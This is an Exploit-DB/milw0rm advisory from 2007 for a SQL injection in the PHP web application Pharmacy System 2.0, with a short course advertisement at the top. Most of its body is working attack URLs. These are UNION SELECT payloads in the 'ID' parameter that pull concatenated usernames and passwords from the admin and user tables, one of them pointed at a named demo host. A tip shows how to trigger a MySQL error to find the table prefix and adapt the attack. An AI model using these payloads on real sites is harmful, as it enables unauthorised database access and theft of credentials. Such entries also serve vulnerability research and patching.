Pharmacy System 2.0 - 'index.php?ID' SQL Injection

EDB-ID:

4095


Author:

t0pP8uZz

Type:

webapps


Platform:

PHP

Date:

2007-06-24


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

--==+================================================================================+==--
--==+             Pharmacy System v2 AND PRIOR SQL INJECTION VULNERBILITYS           +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog


SCRIPT DOWNLOAD: PAY SCRIPT


SITE: http://www.netartmedia.net/pharmacysystem/


DORK: N/A


EXPLOITS:

EXPLOIT 1: http://www.server.com/SCRIPT_PATH/index.php?mod=cart&quantity=1&action=add&ID=-1%20and%201=2%20UNION%20ALL%20SELECT%201,2,3,concat(username,password),5,6,7,8,9,10,11%20FROM%20pharma1_admin_users
EXPLOIT 2: http://www.server.com/SCRIPT_PATH/index.php?mod=cart&quantity=1&action=add&ID=-1%20and%201=2%20UNION%20ALL%20SELECT%201,2,3,concat(username,password),5,6,7,8,9,10,11%20FROM%20pharma1_users

EXAMPLES:

EXAMPLE ON DEMO: http://www.wscreator.com/pharma1/index.php?mod=cart&quantity=1&action=add&ID=-1%20and%201=2%20UNION%20ALL%20SELECT%201,2,3,concat(username,password),5,6,7,8,9,10,11%20FROM%20pharma1_admin_users

NOTE/TIP: Most sites will have diffrent table prefix, so table pharma1_admin_users probarly wont exist, to get the prefix
follow these steps, goto "http://server.com/index.php?page='" this should cause a mysql error and you will be able to
see the mysql query being used for the page variable. Simple replace the prefix from the error with then one in the injection
if you cant do that then dont use the exploit.

GREETZ: str0ke, GM, andy777, Untamed, Don, o0xxdark0o, & everyone at H4CKY0u.org, BHUNITED AND G0t-Root.net


--==+================================================================================+==--
--==+            Pharmacy System v2 AND PRIOR SQL INJECTION VULNERBILITYS            +==--
--==+================================================================================+==-- 

# milw0rm.com [2007-06-24]